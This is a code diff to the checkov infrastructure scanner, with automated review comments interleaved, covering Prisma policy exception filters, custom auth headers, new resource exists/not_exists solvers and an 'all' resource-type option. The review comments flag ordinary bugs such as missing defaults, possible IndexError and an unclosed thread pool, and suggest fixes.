@@ -1043,17 +1130,18 @@ def get_runtime_run_config(self) -> None: except Exception: logging.debug('could not get runtime info for this repo') - def get_prisma_build_policies(self, policy_filter: str) -> None: + def get_prisma_build_policies(self, policy_filter: str, policy_filter_exception: str) -> None: """ Get Prisma policy for enriching runConfig with metadata Filters: https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options :param policy_filter: comma separated filter string. Example, policy.label=A,cloud.type=aws + :param policy_filter_exception: comma separated filter string. Example, policy.label=A,cloud.type=aws :return: """ if self.skip_download is True: logging.debug("Skipping prisma policy API call") return - if not policy_filter: + if not policy_filter and not policy_filter_exception: return if not self.is_prisma_integration(): return 
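Review bot: `get_prisma_build_policies` gains a second required positional parameter, so any existing caller that passes only `policy_filter` now fails with `TypeError`; give it a default, `policy_filter_exception: str | None = None`, and the combined guard on the lines below keeps working. The new docstring entry is a verbatim copy of the `policy_filter` one and does not say what an exception filter does; suggest `:param policy_filter_exception: comma separated filter string selecting policies to exclude, same syntax as policy_filter` (hedged, the semantics are not visible here). The function body continues past the hunk.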
@@ -1061,44 +1149,58 @@ def get_prisma_build_policies(self, policy_filter: str) -> None: raise Exception( "Tried to get prisma build policy metadata, " "but the API key was missing or the integration was not set up") + self.prisma_policies_response = self.get_prisma_policies_for_filter(policy_filter) + self.prisma_policies_exception_response = self.get_prisma_policies_for_filter(policy_filter_exception) + def get_prisma_policies_for_filter(self, policy_filter: str) -> dict[Any, Any] | None: request = None - + filtered_policies = None try: token = self.get_auth_token() - headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers()) + headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers(), self.custom_auth_headers) self.setup_http_manager() if not self.http: logging.error("HTTP manager was not correctly created") - return + return filtered_policies logging.debug(f'Prisma policy URL: {self.prisma_policies_url}') - query_params = convert_prisma_policy_filter_to_dict(policy_filter) + query_params = convert_prisma_policy_filter_to_params(policy_filter) if self.is_valid_policy_filter(query_params, valid_filters=self.get_prisma_policy_filters()): # If enabled and subtype are not explicitly set, use the only acceptable values. - query_params['policy.enabled'] = True - query_params['policy.subtype'] = 'build' + self.add_static_policy_filters(query_params) + logging.debug(f'Filter query params: {query_params}') + request = self.http.request( # type:ignore[no-untyped-call] "GET", self.prisma_policies_url, headers=headers, - fields=query_params, + fields=tuple(query_params), ) - self.prisma_policies_response = json.loads(request.data.decode("utf8")) logging.debug("Got Prisma build policy metadata") - else: - logging.warning("Skipping get prisma build policies. 
--policy-metadata-filter will not be applied.") + filtered_policies = json.loads(request.data.decode("utf8")) except Exception: response_message = f': {request.status} - {request.reason}' if request else '' logging.warning( f"Failed to get prisma build policy metadata from {self.prisma_policies_url}{response_message}", exc_info=True) + return filtered_policies + + @staticmethod + def add_static_policy_filters(query_params: list[tuple[str, str]]) -> list[tuple[str, str]]: + """ + Adds policy.enabled = true, policy.subtype = build to the query params, if these are not already present. Modifies the list in place and also returns it. + """ + if not any(p[0] == 'policy.enabled' for p in query_params): + query_params.append(('policy.enabled', 'true')) + if not any(p[0] == 'policy.subtype' for p in query_params): + query_params.append(('policy.subtype', 'build')) + return query_params def get_prisma_policy_filters(self) -> Dict[str, Dict[str, Any]]: request = None try: token = self.get_auth_token() - headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers()) + headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers(), self.custom_auth_headers) self.setup_http_manager() if not self.http: @@ -1121,7 +1223,7 @@ def get_prisma_policy_filters(self) -> Dict[str, Dict[str, Any]]: return {} @staticmethod - def is_valid_policy_filter(policy_filter: dict[str, str], valid_filters: dict[str, dict[str, Any]] | None = None) -> bool: + def is_valid_policy_filter(policy_filter: list[tuple[str, str]], valid_filters: dict[str, dict[str, Any]] | None = None) -> bool: """ Validates only the filter names """ 
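Review bot: In `get_prisma_policies_for_filter` the `else: logging.warning(...)` branch for an invalid filter was dropped, so a filter that fails `is_valid_policy_filter` now silently yields `None` with no log line at all. The caller also assigns `get_prisma_policies_for_filter(policy_filter_exception)` unconditionally, although the guard above only returns when both filters are empty, so an empty exception filter still goes through token retrieval and validation. Add an early `if not policy_filter: return None` at the top of the helper, and restore a warning in an `else` of the validity check, e.g. `logging.warning("Skipping get prisma build policies. The policy filter will not be applied.")`.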
@@ -1131,7 +1233,7 @@ def is_valid_policy_filter(policy_filter: dict[str, str], valid_filters: dict[st return False if not valid_filters: return False - for filter_name, filter_value in policy_filter.items(): + for filter_name, filter_value in policy_filter: if filter_name not in valid_filters.keys(): logging.warning(f"Invalid filter name: {filter_name}") logging.warning(f"Available filter names: {', '.join(valid_filters.keys())}") @@ -1144,7 +1246,7 @@ def is_valid_policy_filter(policy_filter: dict[str, str], valid_filters: dict[st logging.warning(f"Filter value not allowed: {filter_value}") logging.warning("Available options: True") return False - logging.debug("--policy-metadata-filter is valid") + logging.debug("policy filter is valid") return True def get_public_run_config(self) -> None: @@ -1292,10 +1394,12 @@ def get_default_headers(self, request_type: str) -> dict[str, Any]: if request_type.upper() == "GET": return merge_dicts(get_default_get_headers(self.bc_source, self.bc_source_version), - {"Authorization": self.get_auth_token()}) + {"Authorization": self.get_auth_token()}, + self.custom_auth_headers) elif request_type.upper() == "POST": return merge_dicts(get_default_post_headers(self.bc_source, self.bc_source_version), - {"Authorization": self.get_auth_token()}) + {"Authorization": self.get_auth_token()}, + self.custom_auth_headers) logging.info(f"Unsupported request {request_type}") return {} @@ -1307,7 +1411,8 @@ def get_sso_prismacloud_url(self, report_url: str) -> str: url_saml_config = f"{bc_integration.prisma_api_url}/saml/config" token = self.get_auth_token() headers = merge_dicts(get_auth_header(token), - get_default_get_headers(self.bc_source, self.bc_source_version)) + get_default_get_headers(self.bc_source, self.bc_source_version), + bc_integration.custom_auth_headers) request = self.http.request("GET", url_saml_config, headers=headers, timeout=10) # type:ignore[no-untyped-call] if request.status >= 300: 
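Review bot: `get_sso_prismacloud_url` merges `bc_integration.custom_auth_headers` (the module-level singleton) while every other hunk in this file merges `self.custom_auth_headers`; if the method is ever invoked on a different instance the two header sets diverge silently. Use `self.custom_auth_headers` here for consistency, or add a comment saying why the global is intended (the method already reads `bc_integration.prisma_api_url`, so it may be deliberate).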
@@ -1324,6 +1429,12 @@ def get_sso_prismacloud_url(self, report_url: str) -> str: # If there are any query parameters, append them to the URI if parsed_url.query: uri = f"{uri}?{parsed_url.query}" + + # First encoding + encoded_uri = urllib.parse.quote(uri) + + # Second encoding + uri = urllib.parse.quote(encoded_uri) # Check if the URL already contains GET parameters. if "?" in access_saml_url: report_url = f"{access_saml_url}&{relay_state_param_name}={uri}" diff --git a/checkov/common/bridgecrew/wrapper.py b/checkov/common/bridgecrew/wrapper.py index 8b6e2d050a9..361d361969a 100644 --- a/checkov/common/bridgecrew/wrapper.py +++ b/checkov/common/bridgecrew/wrapper.py @@ -19,7 +19,7 @@ DiGraph = str node_link_data = lambda G : {} - +from checkov.common.sast.consts import CDK_FRAMEWORK_PREFIX, SAST_FRAMEWORK_PREFIX from checkov.common.bridgecrew.check_type import CheckType from checkov.common.models.consts import SUPPORTED_FILE_EXTENSIONS from checkov.common.typing import _ReducedScanReport, LibraryGraph @@ -41,9 +41,6 @@ FILE_NAME_NETWORKX = 'graph_networkx.json' FILE_NAME_RUSTWORKX = 'graph_rustworkx.json' -SAST_FRAMEWORK_PREFIX = 'sast' -CDK_FRAMEWORK_PREFIX = 'cdk' - def _is_scanned_file(file: str) -> bool: file_ending = os.path.splitext(file)[1] @@ -54,7 +51,7 @@ def _put_json_object(s3_client: S3Client, json_obj: Any, bucket: str, object_pat try: s3_client.put_object(Bucket=bucket, Key=object_path, Body=json.dumps(json_obj, cls=CustomJSONEncoder)) except Exception: - logging.error(f"failed to persist object into S3 bucket {bucket}", exc_info=log_stack_trace_on_error) + logging.error(f"failed to persist object into S3 bucket {bucket} - {object_path}", exc_info=log_stack_trace_on_error) raise diff --git a/checkov/common/checks_infra/checks_parser.py b/checkov/common/checks_infra/checks_parser.py index 33f296a1812..2f7ae2d1efd 100644 --- a/checkov/common/checks_infra/checks_parser.py +++ b/checkov/common/checks_infra/checks_parser.py 
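Review bot: The comments `# First encoding` / `# Second encoding` say what the two `urllib.parse.quote` calls do but not why the RelayState value must be percent-encoded twice, which is the one thing the next maintainer will question (presumably the SAML endpoint decodes it once before redirecting — confirm). Replace them with a single why-comment such as `# RelayState is URL-decoded once by the SAML endpoint before the redirect, so encode twice to keep '?' and '&' of the report URL intact` and collapse the pair to `uri = urllib.parse.quote(urllib.parse.quote(uri))`. `quote` keeps `/` literal by default; pass `safe=''` if the whole value should be opaque.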
@@ -58,10 +58,13 @@ ) from checkov.common.checks_infra.solvers.connections_solvers.connection_one_exists_solver import \ ConnectionOneExistsSolver +from checkov.common.checks_infra.solvers.resource_solvers import ExistsResourcerSolver, NotExistsResourcerSolver +from checkov.common.checks_infra.solvers.resource_solvers.base_resource_solver import BaseResourceSolver from checkov.common.graph.checks_infra.base_check import BaseGraphCheck from checkov.common.graph.checks_infra.base_parser import BaseGraphCheckParser from checkov.common.graph.checks_infra.enums import SolverType from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver +from checkov.common.util.env_vars_config import env_vars_config from checkov.common.util.type_forcers import force_list if TYPE_CHECKING: @@ -144,6 +147,12 @@ "attribute": SolverType.ATTRIBUTE, "connection": SolverType.CONNECTION, "filter": SolverType.FILTER, + "resource": SolverType.RESOURCE, +} + +operator_to_resource_solver_classes: dict[str, Type[BaseResourceSolver]] = { + "exists": ExistsResourcerSolver, + "not_exists": NotExistsResourcerSolver, } JSONPATH_PREFIX = "jsonpath_" @@ -195,6 +204,7 @@ def parse_raw_check(self, raw_check: Dict[str, Dict[str, Any]], **kwargs: Any) - check.guideline = raw_check.get("metadata", {}).get("guideline") check.check_path = kwargs.get("check_path", "") solver = self.get_check_solver(check) + solver.providers = providers check.set_solver(solver) return check 
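Review bot: `solver.providers = providers` assumes `get_check_solver` returned an object, but the dispatch it relies on falls back to `lambda *args: None` for unknown operators (see the `operator_to_resource_solver_classes.get(...)` entry in the next hunk), so an unrecognised operator now dies with `AttributeError: 'NoneType' object has no attribute 'providers'` before `set_solver` is reached. Guard it: `if solver is not None: solver.providers = providers`. Where `providers` is bound is outside the hunk; if it is only assigned in a branch above, the line can also raise `NameError`.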
@@ -238,7 +248,11 @@ def _parse_raw_check(self, raw_check: Dict[str, Any], resources_types: Optional[ or (isinstance(resource_type, str) and resource_type.lower() == "all") or (isinstance(resource_type, list) and resource_type[0].lower() == "all") ): - check.resource_types = resources_types or [] + if env_vars_config.CKV_SUPPORT_ALL_RESOURCE_TYPE: + check.resource_types = ['all'] + else: + check.resource_types = resources_types or [] + elif "provider" in resource_type and providers: for provider in providers: check.resource_types.append(f"provider.{provider.lower()}") @@ -298,6 +312,9 @@ def get_check_solver(self, check: BaseGraphCheck) -> BaseSolver: SolverType.FILTER: operator_to_filter_solver_classes.get(check.operator, lambda *args: None)( check.resource_types, check.attribute, check.attribute_value ), + SolverType.RESOURCE: operator_to_resource_solver_classes.get(check.operator, lambda *args: None)( + check.resource_types + ), } solver = type_to_solver.get(check.type) # type:ignore[arg-type] # if not str will return None diff --git a/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py b/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py index 1a30bad1ee8..46a472d05e3 100644 --- a/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py +++ b/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py @@ -51,7 +51,7 @@ def run(self, graph_connector: LibraryGraph) -> Tuple[List[Dict[str, Any]], List if isinstance(graph_connector, DiGraph): for _, data in graph_connector.nodes(data=True): - if (not self.resource_types or data.get(CustomAttributes.RESOURCE_TYPE) in self.resource_types) \ + if self.resource_type_pred(data, self.resource_types) \ and data.get(CustomAttributes.BLOCK_TYPE) in SUPPORTED_BLOCK_TYPES: jobs.append(executer.submit( self._process_node, data, passed_vertices, failed_vertices, unknown_vertices)) 
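Review bot: When `CKV_SUPPORT_ALL_RESOURCE_TYPE` is set, `check.resource_types` becomes the literal list `['all']`, and that sentinel is only understood by `resource_type_pred`; the new `SolverType.RESOURCE` entry in the next hunk hands the same list straight to `ExistsResourcerSolver`, whose `get_operation` is a plain membership test, so an "all" check would look for a resource type literally named `all`. Either translate the sentinel in `get_check_solver` before building the resource solver, or make `BaseResourceSolver` honour it the same way `resource_type_pred` does. A comment on the new branch would help too: `# 'all' is a sentinel expanded by BaseSolver.resource_type_pred, not a resource type`.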
@@ -60,8 +60,7 @@ def run(self, graph_connector: LibraryGraph) -> Tuple[List[Dict[str, Any]], List return passed_vertices, failed_vertices, unknown_vertices for _, data in graph_connector.nodes(): - if (not self.resource_types or data.get(CustomAttributes.RESOURCE_TYPE) in self.resource_types) \ - and data.get(CustomAttributes.BLOCK_TYPE) in SUPPORTED_BLOCK_TYPES: + if self.resource_type_pred(data, self.resource_types) and data.get(CustomAttributes.BLOCK_TYPE) in SUPPORTED_BLOCK_TYPES: jobs.append(executer.submit( self._process_node, data, passed_vertices, failed_vertices, unknown_vertices)) @@ -151,10 +150,14 @@ def _process_node( else: failed_vertices.append(data) + # override in case we need to check all values in a list + def should_check_all_condition(self) -> bool: + return self.is_jsonpath_check + def _evaluate_attribute_matches( self, vertex: dict[str, Any], attribute_matches: list[str], filtered_attribute_matches: list[str] ) -> bool | None: - if self.is_jsonpath_check: + if self.should_check_all_condition(): if self.resource_type_pred(vertex, self.resource_types) and all( self._get_operation(vertex=vertex, attribute=attr) for attr in filtered_attribute_matches ): diff --git a/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py b/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py index a42e8717760..1a39967f237 100644 --- a/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py +++ b/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py @@ -9,3 +9,6 @@ class NotContainsAttributeSolver(ContainsAttributeSolver): def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bool: return not super()._get_operation(vertex, attribute) + + def should_check_all_condition(self) -> bool: + return True 
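Review bot: `should_check_all_condition` in `NotContainsAttributeSolver` returns `True` without saying why, and the base-class hook carries only `# override in case we need to check all values in a list`; the reason that matters is that a negated predicate must hold for every matched attribute value, whereas the default `any` path would pass a resource as soon as one value lacks the substring. Add that as the override's docstring: `"""A not_contains check must hold for every matched attribute value, so force the all() evaluation path."""`. The `_evaluate_attribute_matches` hunk ends before the non-jsonpath branch, so I cannot see what the default path does when the hook is False.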
diff --git a/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py b/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py index 81c3cde5756..6e57a5039eb 100644 --- a/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py +++ b/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py @@ -1,4 +1,4 @@ -from typing import Optional, Any, Dict, List +from typing import Optional, Any, Dict, List, Union from checkov.common.checks_infra.solvers.attribute_solvers.base_attribute_solver import BaseAttributeSolver from checkov.common.graph.checks_infra.enums import Operators from checkov.common.util.type_forcers import force_int @@ -8,9 +8,13 @@ class RangeIncludesAttributeSolver(BaseAttributeSolver): operator = Operators.RANGE_INCLUDES # noqa: CCE003 # a static attribute def __init__( - self, resource_types: List[str], attribute: Optional[str], value: Any, is_jsonpath_check: bool = False + self, resource_types: List[str], attribute: Optional[str], value: Union[Any, List[Any]], + is_jsonpath_check: bool = False ) -> None: - super().__init__(resource_types, attribute, force_int(value), is_jsonpath_check) + # Convert value to a list if it's not already one to unify handling + value = [force_int(v) if isinstance(v, (str, int)) else v for v in + (value if isinstance(value, list) else [value])] + super().__init__(resource_types, attribute, value, is_jsonpath_check) def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bool: attr = vertex.get(attribute) # type:ignore[arg-type] # due to attribute can be None 
@@ -18,6 +22,12 @@ def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bo if attr is None: return False + if isinstance(attr, list): + return any(self._check_value(value, attr_val) for attr_val in attr for value in self.value) + + return any(self._check_value(value, attr) for value in self.value) + + def _check_value(self, value: Any, attr: Any) -> bool: # expects one of the following values: # - an actual int # - a string that parses to an int @@ -28,11 +38,15 @@ def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bo return True if isinstance(attr, str) and attr.count("-") == 1: - try: - start, end = attr.split("-") - return True if force_int(start) <= self.value <= force_int(end) else False - except (TypeError, ValueError): - # Occurs if there are not two entries or if one is not an int, in which case we just give up - return False - - return True if force_int(attr) == self.value else False + return self._check_range(value, attr) + + return bool(force_int(attr) == value) + + @staticmethod + def _check_range(value: Any, range_str: str) -> bool: + try: + start, end = range_str.split("-") + return bool(force_int(start) <= value <= force_int(end)) + except (TypeError, ValueError): + # Occurs if there are not two entries or if one is not an int, in which case we just give up + return False diff --git a/checkov/common/checks_infra/solvers/resource_solvers/__init__.py b/checkov/common/checks_infra/solvers/resource_solvers/__init__.py new file mode 100644 index 00000000000..cc33f5a072d --- /dev/null +++ b/checkov/common/checks_infra/solvers/resource_solvers/__init__.py @@ -0,0 +1,2 @@ +from checkov.common.checks_infra.solvers.resource_solvers.not_exists_resource_solver import ExistsResourcerSolver # noqa +from checkov.common.checks_infra.solvers.resource_solvers.not_exists_resource_solver import NotExistsResourcerSolver # noqa 
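Review bot: `_check_range` compares `force_int(start) <= value <= force_int(end)` with `value` drawn from the normalised `self.value`, and the `__init__` normalisation keeps non-str/int entries — and whatever `force_int` returns for an unparsable string (not visible here) — in the list, so a bad configured value reaches the comparison and is reported as a silent `False` for every vertex instead of a configuration error. Validate in `__init__`, e.g. normalise with `[force_int(v) for v in values]` and emit a `logging.warning` when an entry comes back `None`. The annotation `Union[Any, List[Any]]` collapses to `Any`; either write `Any` or spell out the accepted shapes.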
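Review bot: The new `resource_solvers/__init__.py` imports `ExistsResourcerSolver` from `not_exists_resource_solver`, which only works because that module happens to re-import it; import it from its own module, `from checkov.common.checks_infra.solvers.resource_solvers.exists_resource_solver import ExistsResourcerSolver  # noqa`, so a later cleanup of the not-exists module does not break the package API. The class names carry the typo `Resourcer`; renaming is out of scope here but worth a follow-up before the names spread through checks.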
diff --git a/checkov/common/checks_infra/solvers/resource_solvers/base_resource_solver.py b/checkov/common/checks_infra/solvers/resource_solvers/base_resource_solver.py
new file mode 100644
index 00000000000..5d6f061f4ee
--- /dev/null
+++ b/checkov/common/checks_infra/solvers/resource_solvers/base_resource_solver.py
@@ -0,0 +1,68 @@ +from __future__ import annotations + +from abc import abstractmethod +from typing import Any, Callable, TYPE_CHECKING + +from networkx import DiGraph + +import concurrent.futures + +from concurrent.futures import ThreadPoolExecutor + +from checkov.common.graph.checks_infra.enums import SolverType +from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver +from checkov.common.graph.graph_builder import CustomAttributes + +if TYPE_CHECKING: + from checkov.common.typing import LibraryGraph + + +class BaseResourceSolver(BaseSolver): + def __init__(self, resource_types: list[str]) -> None: + super().__init__(SolverType.RESOURCE) + self.resource_types = resource_types + self.vertices: list[dict[str, Any]] = [] + + @abstractmethod + def get_operation(self, resource_type: str) -> bool: + raise NotImplementedError() + + def _get_operation(self, *args: Any, **kwargs: Any) -> Callable[..., bool]: + # not needed + return lambda: True + + def run( + self, graph_connector: LibraryGraph + ) -> tuple[list[dict[str, Any]], list[dict[str, Any]], list[dict[str, Any]]]: + executer = ThreadPoolExecutor() + jobs = [] + passed_vertices: list[dict[str, Any]] = [] + failed_vertices: list[dict[str, Any]] = [] + unknown_vertices: list[dict[str, Any]] = [] + + if isinstance(graph_connector, DiGraph): + for _, data in graph_connector.nodes(data=True): + jobs.append(executer.submit(self._process_node, data, passed_vertices, failed_vertices, unknown_vertices)) + + concurrent.futures.wait(jobs) + return passed_vertices, failed_vertices, unknown_vertices + + for _, data in graph_connector.nodes(): + result = self.get_operation(resource_type=data.get(CustomAttributes.RESOURCE_TYPE)) + if result: + passed_vertices.append(data) + else: + failed_vertices.append(data) + + return passed_vertices, failed_vertices, [] + + def _process_node(self, data: dict[str, str], passed_vartices: list[dict[str, Any]], + failed_vertices: list[dict[str, Any]], unknown_vertices: 
list[dict[str, Any]]) -> None: + result = self.get_operation(data.get(CustomAttributes.RESOURCE_TYPE)) # type:ignore[arg-type] + # A None indicate for UNKNOWN result - the vertex shouldn't be added to the passed or the failed vertices + if result is None: + unknown_vertices.append(data) + elif result: + passed_vartices.append(data) + else: + failed_vertices.append(data) diff --git a/checkov/common/checks_infra/solvers/resource_solvers/exists_resource_solver.py b/checkov/common/checks_infra/solvers/resource_solvers/exists_resource_solver.py new file mode 100644 index 00000000000..b54189c0935 --- /dev/null +++ b/checkov/common/checks_infra/solvers/resource_solvers/exists_resource_solver.py @@ -0,0 +1,12 @@ +from __future__ import annotations + + +from checkov.common.graph.checks_infra.enums import Operators +from checkov.common.checks_infra.solvers.resource_solvers.base_resource_solver import BaseResourceSolver + + +class ExistsResourcerSolver(BaseResourceSolver): + operator = Operators.EXISTS # noqa: CCE003 # a static attribute + + def get_operation(self, resource_type: str | None) -> bool: + return resource_type in self.resource_types diff --git a/checkov/common/checks_infra/solvers/resource_solvers/not_exists_resource_solver.py b/checkov/common/checks_infra/solvers/resource_solvers/not_exists_resource_solver.py new file mode 100644 index 00000000000..d8d34a801af --- /dev/null +++ b/checkov/common/checks_infra/solvers/resource_solvers/not_exists_resource_solver.py @@ -0,0 +1,13 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.checks_infra.solvers.resource_solvers.exists_resource_solver import ExistsResourcerSolver +from checkov.common.graph.checks_infra.enums import Operators + + +class NotExistsResourcerSolver(ExistsResourcerSolver): + operator = Operators.NOT_EXISTS # noqa: CCE003 # a static attribute + + def get_operation(self, *args: Any, **kwargs: Any) -> bool: + return not super().get_operation(*args, **kwargs) 
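Review bot: `BaseResourceSolver.run` creates a `ThreadPoolExecutor()` that is never shut down, and its two branches disagree: the `DiGraph` path goes through `_process_node`, which routes a `None` result to `unknown_vertices`, while the other path classifies `None` as failed and returns a fresh `[]` for unknowns, so the same check can report differently depending on the graph backend. `get_operation` is annotated `-> bool` although `_process_node` tests its result for `None`; widen it to `bool | None` or drop the `None` branch. Manage the executor with `with` and run both branches through `_process_node`, as below; the parameter name `passed_vartices` in `_process_node` should read `passed_vertices`.
```python
    def run(
        self, graph_connector: LibraryGraph
    ) -> tuple[list[dict[str, Any]], list[dict[str, Any]], list[dict[str, Any]]]:
        passed_vertices: list[dict[str, Any]] = []
        failed_vertices: list[dict[str, Any]] = []
        unknown_vertices: list[dict[str, Any]] = []

        if isinstance(graph_connector, DiGraph):
            # the executor is shut down (all jobs joined) when the block exits
            with ThreadPoolExecutor() as executer:
                jobs = [
                    executer.submit(self._process_node, data, passed_vertices, failed_vertices, unknown_vertices)
                    for _, data in graph_connector.nodes(data=True)
                ]
                concurrent.futures.wait(jobs)
            return passed_vertices, failed_vertices, unknown_vertices

        # same classification (including None -> unknown) for the non-networkx backend
        for _, data in graph_connector.nodes():
            self._process_node(data, passed_vertices, failed_vertices, unknown_vertices)

        return passed_vertices, failed_vertices, unknown_vertices
```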
diff --git a/checkov/common/graph/checks_infra/enums.py b/checkov/common/graph/checks_infra/enums.py index 388a86d1e4a..9858bb6641d 100644 --- a/checkov/common/graph/checks_infra/enums.py +++ b/checkov/common/graph/checks_infra/enums.py @@ -20,6 +20,9 @@ class SolverType(str, Enum): FILTER = "FILTER" # Filters results according to specific value / type, i.e. resource type is aws_s3_bucket + RESOURCE = "RESOURCE" + # Used to define allow/deny lists of resource types + class Operators: ANY = 'any' diff --git a/checkov/common/graph/checks_infra/solvers/base_solver.py b/checkov/common/graph/checks_infra/solvers/base_solver.py index cb7dc58dc24..2258a7ba1b4 100644 --- a/checkov/common/graph/checks_infra/solvers/base_solver.py +++ b/checkov/common/graph/checks_infra/solvers/base_solver.py @@ -4,16 +4,24 @@ from typing import Tuple, List, Dict, Any, TYPE_CHECKING from checkov.common.graph.checks_infra.enums import SolverType +from checkov.common.graph.graph_builder import CustomAttributes +from checkov.common.util.env_vars_config import env_vars_config if TYPE_CHECKING: from networkx import DiGraph +# Based on the resource names in iac frameworks +AWS_KEYS = ['aws_', 'AWS::', 'aws-'] +GCP_KEYS = ['gcloud', 'google_'] +AZURE_KEYS = ['azurerm_', 'Microsoft.'] + class BaseSolver: operator = "" # noqa: CCE003 # a static attribute def __init__(self, solver_type: SolverType) -> None: self.solver_type = solver_type + self.providers: List[str] = [] @abstractmethod def get_operation(self, *args: Any, **kwargs: Any) -> Any: 
@@ -27,6 +35,30 @@ def _get_operation(self, *args: Any, **kwargs: Any) -> Any: def run(self, graph_connector: DiGraph) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]], List[Dict[str, Any]]]: raise NotImplementedError() - @staticmethod - def resource_type_pred(v: Dict[str, Any], resource_types: List[str]) -> bool: - return not resource_types or ("resource_type" in v and v["resource_type"] in resource_types) + def resource_type_pred(self, v: Dict[str, Any], resource_types: List[str]) -> bool: + resource_type = CustomAttributes.RESOURCE_TYPE + if env_vars_config.CKV_SUPPORT_ALL_RESOURCE_TYPE: + is_all_resources = isinstance(resource_types, list) and resource_types[0].lower() == "all" + resource_type_match_provider = self.resource_match_provider(v.get(resource_type, '')) + support_all_resources = bool(resource_type in v and is_all_resources and v.get(resource_type) != 'module' and resource_type_match_provider) + + return not resource_types or support_all_resources + + return not resource_types or (resource_type in v and v[resource_type] in resource_types) + + def resource_match_provider(self, resource_type: str) -> bool: + if not self.providers: + return True + for provider in self.providers: + if provider.lower() == 'aws': + if any(resource_type.startswith(key) for key in AWS_KEYS): + return True + elif provider.lower() == 'gcp': + if any(resource_type.startswith(key) for key in GCP_KEYS): + return True + elif provider.lower() == 'azure': + if any(resource_type.startswith(key) for key in AZURE_KEYS): + return True + else: # if we don't have a provider or the provider was not one of the basic providers + return True + return False diff --git a/checkov/common/graph/graph_builder/graph_components/attribute_names.py b/checkov/common/graph/graph_builder/graph_components/attribute_names.py index ed796ee0137..2439c8efa33 100644 --- a/checkov/common/graph/graph_builder/graph_components/attribute_names.py 
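Review bot: `resource_type_pred` evaluates `resource_types[0].lower()` before the `not resource_types` short-circuit, so with `CKV_SUPPORT_ALL_RESOURCE_TYPE` set an empty `resource_types` list (which `_parse_raw_check` still produces via `resources_types or []` in its non-all branch) raises `IndexError` on every vertex. Make the sentinel test `is_all_resources = bool(resource_types) and isinstance(resource_types, list) and resource_types[0].lower() == "all"`. `v.get(resource_type, '')` also passes an explicit `None` value through to `str.startswith` in `resource_match_provider` — hedged, I cannot see whether the graph builder can store `None` there; `v.get(resource_type) or ''` is the cheap guard. The `else: return True` in `resource_match_provider` returns on the first provider that is not aws/gcp/azure, which may be intended as "unknown providers match everything"; a comment stating that would save the next reader a guess.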
+++ b/checkov/common/graph/graph_builder/graph_components/attribute_names.py @@ -23,6 +23,7 @@ class CustomAttributes: ENCRYPTION = "encryption_" ENCRYPTION_DETAILS = "encryption_details_" TF_RESOURCE_ADDRESS = "__address__" + PROVIDER_ADDRESS = "__provider_address__" REFERENCES = "references_" FOREACH_ATTRS = "foreach_attrs_" SOURCE_MODULE_OBJECT = "source_module_object_" diff --git a/checkov/common/models/consts.py b/checkov/common/models/consts.py index 00a448c3b56..46db66e3397 100644 --- a/checkov/common/models/consts.py +++ b/checkov/common/models/consts.py @@ -27,7 +27,9 @@ SAST_SUPPORTED_FILE_EXTENSIONS = { SastLanguages.JAVA: ['.java'], SastLanguages.JAVASCRIPT: ['.js'], - SastLanguages.PYTHON: ['.py'] + SastLanguages.TYPESCRIPT: ['.ts'], + SastLanguages.PYTHON: ['.py'], + SastLanguages.GOLANG: ['.go'] } ANY_VALUE = "CKV_ANY" diff --git a/checkov/common/models/enums.py b/checkov/common/models/enums.py index 12e428bcfdf..2f302e1f1e2 100644 --- a/checkov/common/models/enums.py +++ b/checkov/common/models/enums.py @@ -26,6 +26,7 @@ class CheckCategories(Enum): SUPPLY_CHAIN = 11 API_SECURITY = 12 SAST = 13 + AI_AND_ML = 14 class OutputFormat(Enum): diff --git a/checkov/common/output/csv.py b/checkov/common/output/csv.py index 2f85730d8b5..5ab899a0b2d 100644 --- a/checkov/common/output/csv.py +++ b/checkov/common/output/csv.py @@ -39,7 +39,7 @@ FILE_NAME_CONTAINER_IMAGES = f"{date_now}_container_images.csv" FILE_NAME_IAC = f"{date_now}_iac.csv" -HEADER_IAC = ["Resource", "Path", "Git Org", "Git Repository", "Misconfigurations", "Severity"] +HEADER_IAC = ["Resource", "Path", "Git Org", "Git Repository", "Misconfigurations", "Severity", "Policy title", "Guideline"] CTA_NO_API_KEY = "SCA, image and runtime findings are only available with a Prisma Cloud subscription." 
@@ -115,11 +115,15 @@ def add_iac_resources(self, resource: Record | ExtraResource, git_org: str, git_ misconfig = None severity = None + check_name = None + guideline = None if isinstance(resource, Record) and resource.check_result["result"] == CheckResult.FAILED: # only failed resources should be added with their misconfiguration misconfig = resource.check_id if resource.severity is not None: severity = resource.severity.name + check_name = resource.check_name + guideline = resource.guideline elif resource_id in self.iac_resource_cache: # IaC resources shouldn't be added multiple times, if they don't have any misconfiguration return @@ -131,6 +135,8 @@ def add_iac_resources(self, resource: Record | ExtraResource, git_org: str, git_ "Git Repository": git_repository, "Misconfigurations": misconfig, "Severity": severity, + "Policy title": check_name, + "Guideline": guideline } if isinstance(resource, Record) and resource.details: diff --git a/checkov/common/output/report.py b/checkov/common/output/report.py index 42762782bc7..1d46ec8ee4f 100644 --- a/checkov/common/output/report.py +++ b/checkov/common/output/report.py 
